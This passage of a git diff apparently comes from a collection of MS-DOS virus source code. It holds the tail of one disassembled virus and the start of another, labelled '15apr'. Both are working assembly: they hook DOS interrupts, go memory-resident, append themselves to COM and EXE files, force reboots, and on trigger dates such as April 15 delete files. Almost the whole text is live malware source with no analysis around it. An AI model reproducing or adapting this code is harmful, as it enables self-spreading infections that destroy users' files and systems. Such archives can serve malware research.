to es:[di] + push ds + pop ss + mov bp,8 + xchg bp,sp + call sub_1 ; (01D5) + jmp loc_24 ; (0552) +loc_3: + call sub_12 ; (05EC) + call sub_2 ; (023D) + jz loc_4 ; Jump if zero + mov al,ds:data_7e + push ax + call sub_3 ; (02AE) + pop ax + mov ds:data_7e,al + jmp short loc_5 ; (01B4) + db 90h +loc_4: + call sub_5 ; (041B) + call sub_6 ; (043D) + cmp byte ptr ds:data_7e,0 + jne loc_5 ; Jump if not equal + mov ax,4C00h + int 21h ; DOS Services ah=function 4Ch + ; terminate with al=return code +loc_5: + cmp byte ptr ds:data_7e,43h ; 'C' + jne loc_8 ; Jump if not equal +loc_6: + pop ds + pop es + push cs + pop ds + pop es + push es + mov di,100h + mov si,10Bh + mov cx,0Ch + repne movsb ; Rep while cx>0 Mov [si] to es:[di] + push es + pop ds + mov ax,100h + push ax + xor ax,ax ; Zero register + retf ; Return far + +vres endp + +; +; SUBROUTINE +; + +sub_1 proc near + mov si,6 + lodsw ; String [si] to ax + cmp ax,192h + je loc_6 ; Jump if equal + cmp ax,179h + jne loc_7 ; Jump if not equal + jmp loc_10 ; (028F) +loc_7: + cmp ax,1DCh + je loc_8 ; Jump if equal + retn +loc_8: + pop ds + pop es + mov bx,cs:data_18 + sub bx,cs:data_29 + mov ax,cs + sub ax,bx + mov ss,ax + mov bp,cs:data_30 + xchg bp,sp + mov bx,cs:data_21 + sub bx,cs:data_22 + mov ax,cs + sub ax,bx + push ax + mov ax,cs:data_23 + push ax + retf ; Return far + db 23h, 1Ah + db '<#/--!.$' + db 0Eh, 23h, 2Fh, 2Dh, 0E0h + db 'D:VRES.COM' + db 0, 58h, 45h, 0, 0 + db 24h, 24h, 24h, 24h, 24h + +; External Entry into Subroutine + +sub_2: + mov ax,3D02h + mov dx,219h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jnc loc_9 ; Jump if carry=0 + clc ; Clear carry flag + retn +loc_9: + mov ds:data_1e,ax + mov dx,673h + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,4202h + mov bx,ds:data_1e + mov cx,0FFFFh + mov dx,0FFFEh + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov dx,27Dh + mov ah,3Fh ; '?' + mov bx,ds:data_1e + mov cx,2 + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push ds + mov dx,ds:data_3e + mov ax,ds:data_2e + mov ds,ax + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop ds + cmp word ptr ds:data_5e,0A0Ch + clc ; Clear carry flag + retn + db 0CDh, 20h +loc_10: + cmp ax,22Dh + je loc_11 ; Jump if equal + push ds + pop es + push cs + pop ds + mov ax,data_26 + mov ss,ax + xchg bp,sp + mov si,13Ch + mov di,0 + mov cx,10h + cld ; Clear direction + repne movsb ; Rep while cx>0 Mov [si] to es:[di] + jmp loc_3 ; (018C) +sub_1 endp + + +; +; SUBROUTINE +; + +sub_3 proc near +loc_11: + mov al,43h ; 'C' + mov ds:data_7e,al + mov al,8 + out 70h,al ; port 70h, RTC addr/enabl NMI + ; al = 8, month register + in al,71h ; port 71h, RTC clock/RAM data + mov ds:data_4e,al + mov dx,219h + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jnc loc_12 ; Jump if carry=0 + retn +loc_12: + mov ds:data_1e,ax + mov dx,10Bh + mov bx,ds:data_1e + mov cx,0Ch + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + push ax + add ax,10h + and ax,0FFF0h + push ax + shr ax,1 ; Shift w/zeros fill + shr ax,1 ; Shift w/zeros fill + shr ax,1 ; Shift w/zeros fill + shr ax,1 ; Shift w/zeros fill + mov di,31Fh + stosw ; Store ax to es:[di] + pop ax + pop bx + sub ax,bx + mov cx,627h + add cx,ax + mov dx,100h + sub dx,ax + mov bx,ds:data_1e + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov ah,40h ; '@' + mov bx,ds:data_1e + mov cx,0Ch + mov dx,31Bh + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ah,3Eh ; '>' + mov bx,ds:data_1e + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + retn +sub_3 endp + + db 0Eh, 8Ch, 0C8h, 5, 1, 0 + db 50h, 0B8h, 0, 1, 50h, 0CBh + +; +; SUBROUTINE +; + +sub_4 proc near + mov al,45h ; 'E' + mov byte ptr ds:[724h],al + mov al,8 + out 70h,al ; port 70h, RTC addr/enabl NMI + ; al = 8, month register + in al,71h ; port 71h, RTC clock/RAM data + mov data_34,al + mov dx,219h + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jnc loc_13 ; Jump if carry=0 + retn +loc_13: + mov data_26,ax + mov dx,10Bh + mov bx,data_26 + mov cx,18h + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + mov ax,4202h + mov cx,0 + mov dx,0 + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + push ax + add ax,10h + adc dx,0 + and ax,0FFF0h + mov data_24,dx + mov data_25,ax + mov cx,727h + sub cx,100h + add ax,cx + adc dx,0 + mov cx,200h + div cx ; ax,dx rem=dx:ax/reg + inc ax + mov data_16,ax + mov data_15,dx + mov ax,data_21 + mov data_22,ax + mov ax,data_20 + mov data_23,ax + mov ax,data_18 + mov data_29,ax + mov ax,data_19 + mov data_30,ax + mov dx,data_24 + mov ax,data_25 + mov cx,10h + div cx ; ax,dx rem=dx:ax/reg + sub ax,10h + sub ax,data_17 + mov data_21,ax + mov data_18,ax + mov data_20,100h + mov data_19,100h + mov ax,4200h + xor cx,cx ; Zero register + mov dx,2 + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov dx,10Dh + mov bx,data_26 + mov cx,16h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov dx,100h + mov ax,data_25 + pop cx + sub ax,cx + sub dx,ax + mov cx,727h + add cx,ax + sub cx,100h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + retn +sub_4 endp + + db 51h, 0B9h, 0, 0, 0B4h, 4Eh + db 0CDh, 21h, 59h, 0C3h + +; +; SUBROUTINE +; + +sub_5 proc near + push es + mov ax,351Ch + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov cs:data_13,bx + mov cs:data_14,es + mov ax,3521h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + push es + pop ax + mov cs:data_12,ax + mov cs:data_11,bx + pop es + retn +sub_5 endp + + +; +; SUBROUTINE +; + +sub_6 proc near + push ax + push es + push ds + xor ax,ax ; Zero register + mov es,ax + mov si,86h + mov ax,es:[si] + mov ds,ax + mov si,725h + cmp word ptr [si],0A0Ch + jne loc_14 ; Jump if not equal + push ds + pop ax + call sub_13 ; (0611) + pop ds + pop es + pop ax + retn +loc_14: + push cs + pop ds + mov ax,data_31 + dec ax + mov es,ax + cmp byte ptr es:[0],5Ah ; 'Z' + je loc_15 ; Jump if equal + jmp short loc_16 ; (04B4) + db 90h +loc_15: + mov ax,es:data_9e + mov cx,737h + shr cx,1 ; Shift w/zeros fill + shr cx,1 ; Shift w/zeros fill + shr cx,1 ; Shift w/zeros fill + shr cx,1 ; Shift w/zeros fill + sub ax,cx + jc loc_16 ; Jump if carry Set + mov es:data_9e,ax + sub es:data_10e,cx + push cs + pop ds + mov ax,es:data_10e + push ax + pop es + mov si,100h + push si + pop di + mov cx,627h + cld ; Clear direction + repne movsb ; Rep while cx>0 Mov [si] to es:[di] + push es + sub ax,ax + mov es,ax + mov si,84h + mov dx,4A8h + mov es:[si],dx + inc si + inc si + pop ax + mov es:[si],ax +loc_16: + pop ds + pop es + pop ax + retn +sub_6 endp + + db 3Ch, 57h, 75h, 3, 0EBh, 1Eh + db 90h, 80h, 0FCh, 1Ah, 75h, 6 + db 0E8h, 17h, 1, 0EBh, 13h, 90h +loc_17: + cmp ah,11h + jne loc_18 ; Jump if not equal + call sub_7 ; (04E1) + iret ; Interrupt return +loc_18: + cmp ah,12h + jne loc_19 ; Jump if not equal + call sub_10 ; (059C) + iret ; Interrupt return +loc_19: + jmp dword ptr cs:data_11 + +; +; SUBROUTINE +; + +sub_7 proc near + mov al,57h ; 'W' + int 21h ; DOS Services ah=function 00h + ; terminate, cs=progm seg prefx + push ax + push cx + push dx + push bx + push bp + push si + push di + push ds + push es + push cs + pop ds + push cs + pop es + mov byte ptr cs:data_35,0 + nop + call sub_8 ; (0514) + jnz loc_20 ; Jump if not zero + call sub_2 ; (023D) + jz loc_20 ; Jump if zero + call sub_15 ; (065A) + dec byte ptr ds:data_6e +loc_20: + pop es + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + retn +sub_7 endp + + +; +; SUBROUTINE +; + +sub_8 proc near + push cs + pop es + push cs + pop es + cld ; Clear direction + call sub_9 ; (0552) + jnc loc_21 ; Jump if carry=0 + cmp di,0 + retn +loc_21: + mov di,219h + mov al,2Eh ; '.' + mov cx,0Bh + repne scasb ; Rept zf=0+cx>0 Scan es:[di] for al + cmp word ptr [di],4F43h + jne loc_22 ; Jump if not equal + cmp byte ptr [di+2],4Dh ; 'M' + jne loc_22 ; Jump if not equal + mov byte ptr ds:[724h],43h ; 'C' + nop + retn +loc_22: + cmp word ptr [di],5845h + jne loc_ret_23 ; Jump if not equal + cmp byte ptr [di+2],45h ; 'E' + jne loc_ret_23 ; Jump if not equal + mov byte ptr ds:[724h],45h ; 'E' + nop + +loc_ret_23: + retn +sub_8 endp + + +; +; SUBROUTINE +; + +sub_9 proc near +loc_24: + push ds + mov si,cs:data_27 + mov ax,cs:data_28 + mov ds,ax + mov di,219h + lodsb ; String [si] to al + cmp al,0FFh + jne loc_25 ; Jump if not equal + add si,6 + lodsb ; String [si] to al + jmp short loc_26 ; (0574) + db 90h +loc_25: + cmp al,5 + jb loc_26 ; Jump if below + pop ds + stc ; Set carry flag + retn +loc_26: + mov cx,0Bh + cmp al,0 + je locloop_27 ; Jump if equal + add al,40h ; '@' + stosb ; Store al to es:[di] + mov al,3Ah ; ':' + stosb ; Store al to es:[di] + +locloop_27: + lodsb ; String [si] to al + cmp al,20h ; ' ' + je loc_28 ; Jump if equal + stosb ; Store al to es:[di] + jmp short loc_29 ; (0594) + db 90h +loc_28: + cmp byte ptr es:[di-1],2Eh ; '.' + je loc_29 ; Jump if equal + mov al,2Eh ; '.' + stosb ; Store al to es:[di] +loc_29: + loop locloop_27 ; Loop if cx > 0 + + mov al,0 + stosb ; Store al to es:[di] + pop ds + clc ; Clear carry flag + retn +sub_9 endp + + +; +; SUBROUTINE +; + +sub_10 proc near + mov al,57h ; 'W' + int 21h ; DOS Services ah=function 00h + ; terminate, cs=progm seg prefx + push ax + push cx + push dx + push bx + push bp + push si + push di + push ds + push es + push cs + pop ds + push cs + pop es + cmp byte ptr cs:data_35,0 + je loc_30 ; Jump if equal + jmp short loc_31 ; (05D3) + db 90h +loc_30: + call sub_8 ; (0514) + jnz loc_31 ; Jump if not zero + call sub_2 ; (023D) + jz loc_31 ; Jump if zero + call sub_15 ; (065A) + dec byte ptr ds:data_6e + pop es + pop ds + pop di + pop si +data_35 db 5Dh + db 5Bh, 5Ah, 59h, 58h, 0C3h +loc_31: + pop es + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + retn +sub_10 endp + + db 0 + +; +; SUBROUTINE +; + +sub_11 proc near + push ax + push ds + pop ax + mov cs:data_28,ax + mov cs:data_27,dx + pop ax + retn +sub_11 endp + + +; +; SUBROUTINE +; + +sub_12 proc near + push cs + mov al,0 + out 20h,al ; port 20h, 8259-1 int command + mov ax,3524h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov ds:data_3e,bx + mov bx,es + mov ds:data_2e,bx + pop es + mov si,20Ah + mov di,219h + mov cx,0Fh + +locloop_32: + lodsb ; String [si] to al + add al,20h ; ' ' + stosb ; Store al to es:[di] + loop locloop_32 ; Loop if cx > 0 + + retn +sub_12 endp + + +; +; SUBROUTINE +; + +sub_13 proc near + push ax + push cs + pop ds + push cs + pop es + mov bl,data_34 + cmp bl,0Ch + ja loc_34 ; Jump if above + cmp bl,0 + je loc_34 ; Jump if equal + mov al,8 + out 70h,al ; port 70h, RTC addr/enabl NMI + ; al = 8, month register + in al,71h ; port 71h, RTC clock/RAM data + cmp al,0Ch + ja loc_34 ; Jump if above + cmp al,0 + je loc_34 ; Jump if equal + cmp al,bl + je loc_34 ; Jump if equal + inc bl + call sub_14 ; (064F) + cmp al,bl + je loc_34 ; Jump if equal + inc bl + call sub_14 ; (064F) + cmp al,bl + je loc_34 ; Jump if equal + pop ds + call sub_16 ; (0686) + push cs + pop ds + retn + +; External Entry into Subroutine + +sub_14: + cmp bl,0Ch + jbe loc_ret_33 ; Jump if below or = + sub bl,0Ch + +loc_ret_33: + retn +loc_34: + pop ax + retn +sub_13 endp + + +; +; SUBROUTINE +; + +sub_15 proc near + mov dx,673h + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + cmp byte ptr ds:[724h],43h ; 'C' + jne loc_35 ; Jump if not equal + call sub_3 ; (02AE) + jmp short loc_36 ; (0672) + db 90h +loc_35: + call sub_4 ; (0337) +loc_36: + push ds +sub_15 endp + + +; +; +; External Entry Point +; +; + +int_24h_entry proc far + mov dx,data_33 + mov ax,data_32 + mov ds,ax + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop ds + retn +int_24h_entry endp + + db 0B0h, 3, 0CFh + +; +; SUBROUTINE +; + +sub_16 proc near + mov dx,6B0h + mov ax,251Ch + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov byte ptr ds:data_8e,90h + nop + mov ax,0B800h + mov es,ax +data_36 db 0BFh +data_37 dw 0FA0h + db 0B8h, 20h, 7, 0B9h, 0Bh, 0 + db 0F2h, 0ABh, 0Eh, 7, 0C3h, 0 + db 0, 0, 20h, 7, 0Fh + db 0Ah +data_38 db 0Fh + db 0Ah +data_39 db 0Fh + db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh + db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0F7h + db 0Eh, 0EEh, 0Ch, 90h, 0FBh, 50h + db 51h, 52h, 53h, 55h, 56h, 57h + db 1Eh, 6, 0Eh, 1Fh, 0EBh, 0Bh + db 90h +loc_37: + pop es + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + iret ; Interrupt return +sub_16 endp + + db 0B8h, 0, 0B8h, 8Eh, 0C0h, 0E8h + db 2Bh, 0, 0BEh, 9Ah, 6, 0B9h + db 16h, 0, 0F2h, 0A4h, 80h, 3Eh + db 0AEh, 6, 0EEh, 74h, 8, 0C6h + db 6, 0AEh, 6, 0EEh, 0EBh, 6 + db 90h +loc_38: + mov data_38,0F0h +loc_39: + mov ax,es:[di] + mov ah,0Eh + mov data_37,ax + mov data_36,0 + jmp short loc_37 ; (06D0) + +; +; SUBROUTINE +; + +sub_17 proc near + mov di,0 +loc_40: + mov si,69Ch + push di + mov cx,12h + cld ; Clear direction + repe cmpsb ; Rept zf=1+cx>0 Cmp [si] to es:[di] + pop di + jz loc_41 ; Jump if zero + inc di + inc di + cmp di,0FA0h + jne loc_40 ; Jump if not equal + mov di,0 +loc_41: + cmp di,0F9Eh + jne loc_ret_42 ; Jump if not equal + mov data_39,0CFh + +loc_ret_42: + retn +sub_17 endp + + db 43h, 0Ch, 0Ah + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.15apr.asm b/MSDOS/Virus.MSDOS.Unknown.15apr.asm new file mode 100644 index 00000000..79ec33c0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.15apr.asm @@ -0,0 +1,679 @@ + +PAGE 60,132 + +; +; +; 15APR +; +; Created: 4-Mar-91 +; +; + +data_1e equ 4Ch ; (0000:004C=31h) +data_2e equ 4Eh ; (0000:004E=70h) +data_3e equ 84h ; (0000:0084=0E3h) +data_4e equ 86h ; (0000:0086=161Ah) +data_5e equ 90h ; (0000:0090=8Eh) +data_6e equ 92h ; (0000:0092=1498h) +data_7e equ 102h ; (0000:0102=0CC00h) +data_8e equ 106h ; (0000:0106=326h) +data_9e equ 47Bh ; (0000:047B=0) +data_10e equ 0 ; (0326:0000=6A7h) +data_11e equ 2 ; (0326:0002=70h) +data_12e equ 0 ; (0691:0000=0C9h) +data_13e equ 1 ; (0692:0001=0D217h) +data_14e equ 2 ; (06E3:0002=2342h) +data_15e equ 6 ; (06E3:0006=2344h) +data_32e equ 0FC99h ; (701E:FC99=0) +data_33e equ 0FC9Bh ; (701E:FC9B=0) +data_34e equ 0FCB7h ; (701E:FCB7=0) +data_35e equ 0FCB9h ; (701E:FCB9=0) +data_36e equ 0FCBBh ; (701E:FCBB=0) +data_37e equ 0FCC5h ; (701E:FCC5=0) +data_38e equ 0FCC7h ; (701E:FCC7=0) +data_39e equ 0FCCDh ; (701E:FCCD=0) +data_40e equ 0FCCFh ; (701E:FCCF=0) + +code_seg_a segment + assume cs:code_seg_a, ds:code_seg_a + + + org 100h + +b15apr proc far + +start: +data_16 dw 63E9h +data_17 dw 0C303h + db 23 dup (0C3h) + db 2Ah, 2Eh, 45h, 58h, 45h, 0 +data_19 dw 0C3C3h +data_20 dw 0C3C3h +data_21 dw 0 +data_22 dw 0 +data_23 dw 0 +data_24 dw 0 +data_25 dw 0 +data_26 dd 00000h +data_27 dw 0 +data_28 dw 0 +data_29 dd 00000h +data_30 dw 0 +data_31 dw 0 + db 0Ah, 0Dh, 0Ah, 0Dh, ' Bhaktivedan' + db 'ta Swami Prabhupada (1896-1977)', 0Ah + db 0Dh, 0Ah, 0Dh, '$=MKu', 9, 'U' + db 8Bh, 0ECh, 83h, 66h, 6, 0FEh + db 5Dh, 0CFh, 80h, 0FCh, 4Bh, 74h + db 12h, 3Dh, 0, 3Dh, 74h, 0Dh + db 3Dh, 0, 6Ch, 75h, 5, 80h + db 0FBh, 0, 74h, 3 +loc_1: + jmp loc_15 +loc_2: + push es + push ds + push di + push si + push bp + push dx + push cx + push bx + push ax + call sub_6 + call sub_7 + cmp ax,6C00h + jne loc_3 ; Jump if not equal + mov dx,si +loc_3: + mov cx,80h + mov si,dx + +locloop_4: + inc si + mov al,[si] + or al,al ; Zero ? + loopnz locloop_4 ; Loop if zf=0, cx>0 + + sub si,2 + cmp word ptr [si],4D4Fh + je loc_7 ; Jump if equal + cmp word ptr [si],4558h + je loc_6 ; Jump if equal +loc_5: + jmp short loc_14 + db 90h +loc_6: + cmp word ptr [si-4],4E41h + je loc_8 ; Jump if equal + cmp word ptr [si-4],444Ch + je loc_8 ; Jump if equal + cmp word ptr [si-4],4A52h + je loc_8 ; Jump if equal + jnz loc_9 ; Jump if not zero +loc_7: + cmp word ptr [si-4],444Eh + je loc_5 ; Jump if equal + jnz loc_10 ; Jump if not zero +loc_8: + int 19h ; Bootstrap loader +loc_9: + jz loc_10 ; Jump if zero +loc_10: + mov ax,3D02h + call sub_5 + jc loc_14 ; Jump if carry Set + mov bx,ax + mov ax,5700h + call sub_5 + mov cs:data_22,cx ; (701E:0127=0) + mov cs:data_23,dx ; (701E:0129=0) + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + push cs + pop ds + mov dx,103h + mov si,dx + mov cx,18h + mov ah,3Fh ; '?' + call sub_5 + jc loc_12 ; Jump if carry Set + cmp word ptr [si],5A4Dh + jne loc_11 ; Jump if not equal + call sub_1 + jmp short loc_12 +loc_11: + call sub_4 +loc_12: + jc loc_13 ; Jump if carry Set + mov ax,5701h + mov cx,cs:data_22 ; (701E:0127=0) + mov dx,cs:data_23 ; (701E:0129=0) + call sub_5 +loc_13: + mov ah,3Eh ; '>' + call sub_5 +loc_14: + call sub_7 + pop ax + pop bx + pop cx + pop dx + pop bp + pop si + pop di + pop ds + pop es +loc_15: + jmp cs:data_26 ; (701E:012F=0) + +b15apr endp + +; +; SUBROUTINE +; + +sub_1 proc near + mov ah,2Ah ; '*' + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dx=mon/day + cmp dh,4 + je loc_16 ; Jump if equal + jnz loc_17 ; Jump if not zero +loc_16: + mov ah,2Ah ; '*' + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dx=mon/day + cmp dl,0Fh + je loc_18 ; Jump if equal + jnz loc_17 ; Jump if not zero +loc_17: + mov cx,[si+16h] + add cx,[si+8] + mov ax,10h + mul cx ; dx:ax = reg * ax + add ax,[si+14h] + adc dx,0 + push dx + push ax + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + cmp dx,0 + jne loc_19 ; Jump if not equal + cmp ax,4E2h + jae loc_19 ; Jump if above or = + pop ax + pop dx + stc ; Set carry flag + ret +loc_18: + mov dx,10h + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + mov dx,11Bh + mov cx,110Bh + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + mov dx,2Eh + mov ax,3D02h + int 15h ; General services, ah=func 3Dh + mov ah,41h ; 'A' + int 21h ; DOS Services ah=function 41h + ; delete file, name @ ds:dx + jmp loc_25 + db 0BAh, 3Fh, 1, 0B4h, 9, 0CDh + db 21h, 0EBh, 1, 90h +loc_19: + mov di,ax + mov bp,dx + pop cx + sub ax,cx + pop cx + sbb dx,cx + cmp word ptr [si+0Ch],0 + je loc_ret_22 ; Jump if equal + cmp dx,0 + jne loc_20 ; Jump if not equal + cmp ax,4E2h + jne loc_20 ; Jump if not equal + stc ; Set carry flag + ret +loc_20: + mov dx,bp + mov ax,di + push dx + push ax + add ax,4E2h + adc dx,0 + mov cx,200h + div cx ; ax,dx rem=dx:ax/reg + les di,dword ptr [si+2] ; Load 32 bit ptr + mov cs:data_24,di ; (701E:012B=0) + mov cs:data_25,es ; (701E:012D=0) + mov [si+2],dx + cmp dx,0 + je loc_21 ; Jump if equal + inc ax +loc_21: + mov [si+4],ax + pop ax + pop dx + call sub_2 + sub ax,[si+8] + les di,dword ptr [si+14h] ; Load 32 bit ptr + mov data_19,di ; (701E:0121=0C3C3h) + mov data_20,es ; (701E:0123=0C3C3h) + mov [si+14h],dx + mov [si+16h],ax + mov word ptr data_21,ax ; (701E:0125=0) + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + call sub_3 + jc loc_ret_22 ; Jump if carry Set + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + mov ah,40h ; '@' + mov dx,si + mov cx,18h + call sub_5 + +loc_ret_22: + ret + +; External Entry into Subroutine + +sub_2: + mov cx,4 + mov di,ax + and di,0Fh + +locloop_23: + shr dx,1 ; Shift w/zeros fill + rcr ax,1 ; Rotate thru carry + loop locloop_23 ; Loop if cx > 0 + + mov dx,di + ret + +; External Entry into Subroutine + +sub_3: + mov ah,40h ; '@' + mov cx,4E2h + mov dx,100h + call sub_6 + jmp short loc_29 + db 90h + +; External Entry into Subroutine + +sub_4: + mov ah,2Ah ; '*' + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dx=mon/day + cmp al,6 + je loc_24 ; Jump if equal + jnz loc_25 ; Jump if not zero +loc_24: + mov dx,10h + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + mov dx,11Bh + mov cx,110Bh + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + mov dx,2Eh + mov ax,3D02h + int 15h ; General services, ah=func 3Dh + mov ah,41h ; 'A' + int 21h ; DOS Services ah=function 41h + ; delete file, name @ ds:dx + jmp short loc_25 + db 90h +loc_25: + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + cmp ax,4E2h + jb loc_ret_28 ; Jump if below + cmp ax,0FA00h + jae loc_ret_28 ; Jump if above or = + push ax + cmp byte ptr [si],0E9h + jne loc_26 ; Jump if not equal + sub ax,4E5h + cmp ax,[si+1] + jne loc_26 ; Jump if not equal + pop ax + stc ; Set carry flag + ret +loc_26: + call sub_3 + jnc loc_27 ; Jump if carry=0 + pop ax + ret +loc_27: + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + pop ax + sub ax,3 + mov dx,121h + mov si,dx + mov byte ptr cs:[si],0E9h + mov cs:[si+1],ax + mov ah,40h ; '@' + mov cx,3 + call sub_5 + +loc_ret_28: + ret +sub_1 endp + + +; +; SUBROUTINE +; + +sub_5 proc near +loc_29: + pushf ; Push flags + call cs:data_26 ; (701E:012F=0) + ret +sub_5 endp + + +; +; SUBROUTINE +; + +sub_6 proc near + push ax + push ds + push es + xor ax,ax ; Zero register + push ax + pop ds + cli ; Disable interrupts + les ax,dword ptr ds:data_5e ; (0000:0090=18Eh) Load 32 bit ptr + mov cs:data_27,ax ; (701E:0133=0) + mov cs:data_28,es ; (701E:0135=0) + mov ax,44Eh + mov ds:data_5e,ax ; (0000:0090=18Eh) + mov ds:data_6e,cs ; (0000:0092=1498h) + les ax,dword ptr ds:data_1e ; (0000:004C=831h) Load 32 bit ptr + mov cs:data_30,ax ; (701E:013B=0) + mov cs:data_31,es ; (701E:013D=0) + les ax,cs:data_29 ; (701E:0137=0) Load 32 bit ptr + mov ds:data_1e,ax ; (0000:004C=831h) + mov ds:data_2e,es ; (0000:004E=70h) + sti ; Enable interrupts + pop es + pop ds + pop ax + ret +sub_6 endp + + +; +; SUBROUTINE +; + +sub_7 proc near + push ax + push ds + push es + xor ax,ax ; Zero register + push ax + pop ds + cli ; Disable interrupts + les ax,dword ptr cs:data_27 ; (701E:0133=0) Load 32 bit ptr + mov ds:data_5e,ax ; (0000:0090=18Eh) + mov ds:data_6e,es ; (0000:0092=1498h) + les ax,dword ptr cs:data_30 ; (701E:013B=0) Load 32 bit ptr + mov ds:data_1e,ax ; (0000:004C=831h) + mov ds:data_2e,es ; (0000:004E=70h) + sti ; Enable interrupts + pop es + pop ds + pop ax + ret +sub_7 endp + + db 0B0h, 3, 0CFh + +; +; SUBROUTINE +; + +sub_8 proc near + mov dx,10h + mul dx ; dx:ax = reg * ax + ret +sub_8 endp + + +; +; SUBROUTINE +; + +sub_9 proc near + xor ax,ax ; Zero register + xor bx,bx ; Zero register + xor cx,cx ; Zero register + xor dx,dx ; Zero register + xor si,si ; Zero register + xor di,di ; Zero register + xor bp,bp ; Zero register + ret +sub_9 endp + + db 1Eh, 0E8h, 0, 0 + +; +; SUBROUTINE +; + +sub_10 proc near + mov ax,4B4Dh + nop + int 21h ; DOS Services ah=function 4Bh + ; run progm @ds:dx, parm @es:bx + jc loc_30 ; Jump if carry Set + jmp loc_40 +loc_30: + pop si + push si + nop + mov di,si + xor ax,ax ; Zero register + push ax + pop ds + les ax,dword ptr ds:data_1e ; (0000:004C=831h) Load 32 bit ptr + mov cs:data_39e[si],ax ; (701E:FCCD=0) + mov cs:data_40e[si],es ; (701E:FCCF=0) + les bx,dword ptr ds:data_3e ; (0000:0084=6E3h) Load 32 bit ptr + mov cs:data_37e[di],bx ; (701E:FCC5=0) + mov cs:data_38e[di],es ; (701E:FCC7=0) + mov ax,ds:data_7e ; (0000:0102=0CC00h) + cmp ax,0F000h + jne loc_38 ; Jump if not equal + mov dl,80h + mov ax,ds:data_8e ; (0000:0106=326h) + cmp ax,0F000h + je loc_31 ; Jump if equal + cmp ah,0C8h + jb loc_38 ; Jump if below + cmp ah,0F4h + jae loc_38 ; Jump if above or = + test al,7Fh + jnz loc_38 ; Jump if not zero + mov ds,ax + cmp word ptr ds:data_10e,0AA55h ; (0326:0000=6A7h) + jne loc_38 ; Jump if not equal + mov dl,ds:data_11e ; (0326:0002=70h) +loc_31: + mov ds,ax + xor dh,dh ; Zero register + mov cl,9 + shl dx,cl ; Shift w/zeros fill + mov cx,dx + xor si,si ; Zero register + +locloop_32: + lodsw ; String [si] to ax + cmp ax,0FA80h + jne loc_33 ; Jump if not equal + lodsw ; String [si] to ax + cmp ax,7380h + je loc_34 ; Jump if equal + jnz loc_35 ; Jump if not zero +loc_33: + cmp ax,0C2F6h + jne loc_36 ; Jump if not equal + lodsw ; String [si] to ax + cmp ax,7580h + jne loc_35 ; Jump if not equal +loc_34: + inc si + lodsw ; String [si] to ax + cmp ax,40CDh + je loc_37 ; Jump if equal + sub si,3 +loc_35: + dec si + dec si +loc_36: + dec si + loop locloop_32 ; Loop if cx > 0 + + jmp short loc_38 +loc_37: + sub si,7 + mov cs:data_39e[di],si ; 